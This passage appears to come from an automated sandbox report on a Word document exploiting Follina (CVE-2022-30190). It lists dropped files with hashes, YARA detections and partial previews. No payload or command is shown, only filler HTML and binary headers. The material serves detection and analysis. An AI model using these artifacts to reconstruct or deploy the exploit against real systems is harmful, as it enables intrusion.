                                                                                                                                                                      SSDEEP:3:GUfFF/FaV:DtFdu
                                                                                                                                                                      MD5:C2AC3C4E2F040FECC0C759333329FC5F
                                                                                                                                                                      SHA1:D60D4854A23808FD2D67A20DDD9001D5567B1F53
                                                                                                                                                                      SHA-256:F42C7EE07D25E6BCABCFDA1B8EA31928008FDA1A2C51E8D5C08410E6802EF2F3
                                                                                                                                                                      SHA-512:5EFBE74E618899E05B228FB255CBF20468ED9303723F508202CED231FB0CAD966A92D7F092FC286CA5211EB8F56A0C6EA5CD742D94003064E7C42D92137C9DF8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:855271. Admin.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DD77C7D6-2AC5-4FD4-86E9-418877D1BD59

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147863
                                                                                                                                                                      Entropy (8bit):5.3589579589937095
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:PcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:OHQ9DQW+zIXLI
                                                                                                                                                                      MD5:87FB26E1D0012B07EAFADBCA4DB26C9C
                                                                                                                                                                      SHA1:A1BCD06085146F821F90C29449DDBD0F7AF9161D
                                                                                                                                                                      SHA-256:9086C5DAAE4C97AEA27959F6B9B69482E9C61E1D9BCF29B8AEB8DEBEA50C60EA
                                                                                                                                                                      SHA-512:F5F02C2C0180D115EF3A3B1BFD025BE299609A1029527349079BAA492B0521BA5E8255B7F38AC0F9FFC323352B549AAB220B3222D066D89A7702CCA29F6C2C2B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T17:50:06">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Joe Security
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Joe Security
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2130
                                                                                                                                                                      Entropy (8bit):1.1618571236537212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1SXV5:mbb2sOhYk5vnZA5Rn/YnRn/doQ5
                                                                                                                                                                      MD5:4F8C0EAC84D2D1AEEDABF24EF834DEFF
                                                                                                                                                                      SHA1:7B75446CBB512AD6C13F12A35948E1548FD62864
                                                                                                                                                                      SHA-256:8FB6FE075C6777639474427C864A13E5EAB1ECF7016DD1C23B9CA8FA7A7D0188
                                                                                                                                                                      SHA-512:83839667E41A748A703F80D0CE533F37922433973EFC0949D34D2B3E7FFC8548A04682D97A1457CB7E92C667541EBB2BED0432A59084558A4BBE5E1CE8567494
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9637A4EF-9FF4-43D0-9F94-84AF1936C274}.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Joe Security
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].htm (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9728
                                                                                                                                                                      Entropy (8bit):4.79749305864191
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:WKqedmYoNKvUTCSH3gR8H8FgwSHwBnkwZYPaSJ365OOieMjQZa2RnIj2K:bElNK8TCSfHyPnkwZ+vKOBQZXn2
                                                                                                                                                                      MD5:A3852564CA718AB40C68A255EEB0F8DF
                                                                                                                                                                      SHA1:3A99D23AB2B157C0BD759FCA73047F8BB8611EF4
                                                                                                                                                                      SHA-256:D05D1D1CAA819EEFFF6121EE9E746D96360EC76D8CFD77FFD8736CF9EFFCEB66
                                                                                                                                                                      SHA-512:19134AB877F434B2564239218B5CB0865114D90E804673EE53980A685869134296A5347009E0AC37B43BB3E6D1E6FD821FC74EA65474BA2240DC687C1BB02F06
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.1008166912794564
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryO+PfGak7Ynqq1+PfXPN5Dlq5J:+RI+ycuZhNt+akSKfPNnqX
                                                                                                                                                                      MD5:CCEC6FC0B20BEA34F917C387969FA636
                                                                                                                                                                      SHA1:03EC62AE92518E8478297BD1F7A197EF0D71E113
                                                                                                                                                                      SHA-256:BE61BE9DA2757D7EE9A09F1C07D6B13D60515FFC7417BA6C3FC503A0094B499A
                                                                                                                                                                      SHA-512:9656E5185B2A211A44200B19D59A3E810D02D7FEAD0BE833064D4CDF914C4808CFFD5F8B00B14FBCF31E2FE9DD54302E100E2045E9FE9C7C0F0EC8B469EB5698
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES1B1C.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.093180645604145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H7C9A+6UidkHKhKe3feI+ycuZhNt+akSKfPNnq9Wd:rLxdkAKe3m1ult+a3K9q9m
                                                                                                                                                                      MD5:26E20DE969A81AD21D8C11428DD8D335
                                                                                                                                                                      SHA1:D0B522B5F0B8C437683568C4ACC3CFFEF57F1196
                                                                                                                                                                      SHA-256:6FA6A619B3D754E6ECBAF12B4801B98EE34B1E56DEA9C1942B118CF4B5393476
                                                                                                                                                                      SHA-512:07D1DA0B64C34B3909CC2D890033647CA9120CE3778430D86736F4172F2DECEDF31C6FDA651840F747AB70B88C4ADBE764D85D3C6162495D780274253B9A1171
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP.................o....4......6..........5.......C:\Users\user\AppData\Local\Temp\RES1B1C.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES2969.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1368
                                                                                                                                                                      Entropy (8bit):4.076886897377885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H53W9o66GFmkHphKe3feI+ycuZhNHakSZPNnq9Yld:d/+FjXKe3m1ulHa3bq9YP
                                                                                                                                                                      MD5:437DD08072E93358CBBD0EB7C0176472
                                                                                                                                                                      SHA1:77D262C59FBA3C6B4002A9E38C829376EF60635B
                                                                                                                                                                      SHA-256:84B9F374AB5B62DACB0079B86C28D3648BB8917B7EB3C6CCAD847A7342E475F6
                                                                                                                                                                      SHA-512:290832204B93C94B84575B54545F69FB245676081AF572BE70AB7D8C429AB0CB094744192340EEA8E6EE1C8E8EA96A65E9DFD9937FA5BE8FCFE3E7546E6F94AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP....................&w.o...}...h............5.......C:\Users\user\AppData\Local\Temp\RES2969.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES4732.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1368
                                                                                                                                                                      Entropy (8bit):4.087579112057223
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Hm3W9oVKpkHJhKe3feI+ycuZhN9akSLPNnq9Yld:A/VCk3Ke3m1ul9a3hq9YP
                                                                                                                                                                      MD5:7810C97B7394B23F7585151B24284EC7
                                                                                                                                                                      SHA1:2C1AD090AB3DFA44BEB3CF426427611242647D40
                                                                                                                                                                      SHA-256:C98816400EDFA15F7D3EE43309F7E63C986046942F3DFEB93E4C4D647A98CAAE
                                                                                                                                                                      SHA-512:B3F4F06C3F00309A40DD15E82F21048319A84D7B1577F325DECE02482ACF139E4DAB8EC5993FCD57EBC270AAFEF31051C7F5DB32DB614A761AD3437F05C13E66
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP...................T......Ed....t...........5.......C:\Users\user\AppData\Local\Temp\RES4732.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.0895003920163724
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7YnqqZPN5Dlq5J:+RI+ycuZhNHakSZPNnqX
                                                                                                                                                                      MD5:CC7F2677166FB391007D83F88C688CA1
                                                                                                                                                                      SHA1:AF0717ACCDF6F325737DC93AE8FFC17B46E7977F
                                                                                                                                                                      SHA-256:120DEF284865455EA87557F01AF1118C8DD9F6BC03E733FC281EF2A636D746F4
                                                                                                                                                                      SHA-512:E350EC8168352FA19CC9A4EC4F13A2E1E4643EB85B2EA3CD5EC0B2F20CF71162F710815DC8152F3BA8406623C0ADA6FC0D7C3A792028030A0322FA867F9A0F9C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5120
                                                                                                                                                                      Entropy (8bit):3.782786887295759
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:64oPhmKraYZkH8KTibUyPkwjj0JeC+CFSlwYNfc1ulHa3bq:ODaAkHHoxk8ZCuNnlK
                                                                                                                                                                      MD5:766473A4C386B81551C7D3971EC5AC33
